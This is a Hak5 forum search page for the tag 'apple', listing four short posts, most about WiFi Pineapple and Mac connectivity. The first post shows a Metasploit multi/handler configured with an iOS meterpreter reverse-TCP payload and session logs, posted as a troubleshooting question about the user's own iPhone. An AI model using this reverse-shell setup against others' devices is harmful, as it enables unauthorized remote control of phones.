Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'apple'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Bash Bunny
    • Packet Squirrel
    • LAN Turtle
    • USB Rubber Ducky
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 4 results

  1. Hi.... im trying to "hack" my IOS 11 iPhone 5S with this settings in Metasploit msf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (apple_ios/aarch64/meterpreter_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.178.179 yes The listen address LPORT 443 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target then i take my IOS Device, open Safari and visit the URL Metasploit shows me..... in my case this would be https://192.168.178.179:443 if the Page opens Metasploit gives me this ---> msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.178.179:443 [*] 192.168.178.23 - Meterpreter session 7 closed. Reason: Died [*] Meterpreter session 7 opened (127.0.0.1 -> 192.168.178.23:51820) at 2018-03-15 00:17:53 +0100 [*] Meterpreter session 8 opened (192.168.178.179:443 -> 192.168.178.23:51821) at 2018-03-15 00:17:55 +0100 [*] 192.168.178.23 - Meterpreter session 8 closed. Reason: Died [*] Meterpreter session 9 opened (192.168.178.179:443 -> 192.168.178.23:51822) at 2018-03-15 00:17:56 +0100 [*] 192.168.178.23 - Meterpreter session 9 closed. Reason: Died [*] 192.168.178.23 - Meterpreter session 10 closed. Reason: Died [*] Meterpreter session 10 opened (127.0.0.1 -> 192.168.178.23:51823) at 2018-03-15 00:17:57 +0100 Whats the Problem? Should i forward Port 51820? Or which one i have to choose? Thanks for helping and stay wet!
  2. bashincajun

    Why so many Apples

    I am traveling so to pass the time i have been watching alot of talks given at some of the most recent Cons and i noticed that there are a lot of Security Professionals that i see using MACs, anyone have any idea why? is it a convenience thing? or just preference? I have used a Mac in the past and the only thing that i liked about it was Parallels had a very smooth transition between OSs but that was it.
  3. Hello, Is the female USB connector on the Pineapple Nano supposed to be used to tether (or share internet connection) with? I received my Nano in the mail the other day and nothing happens if I connect an USB to USB-C cable between the Nano and my MBP (Late 2016). However, if I use the Y-cable it does, but my goal is to be able to use the Pineapple 4000 battery to power the Nano and not the other way around. Or is the female USB on the Nano used for something else?
  4. I just recently got my tetra. It works great on linux systems, but I have a macbook that I would like to use the tetra on doesn't connect with the default IP address and does not show up in ifconfig. What am I doing wrong? Am I missing a step?
×